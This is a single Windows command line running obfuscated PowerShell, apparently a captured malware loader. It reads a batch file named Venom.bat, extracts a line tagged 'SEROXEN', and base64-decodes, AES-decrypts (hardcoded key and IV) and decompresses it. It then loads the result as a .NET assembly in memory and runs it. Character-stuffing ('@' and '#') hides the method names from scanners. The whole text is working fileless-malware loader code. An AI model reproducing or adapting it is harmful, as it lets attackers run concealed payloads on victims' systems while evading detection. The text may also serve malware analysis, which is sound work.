C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "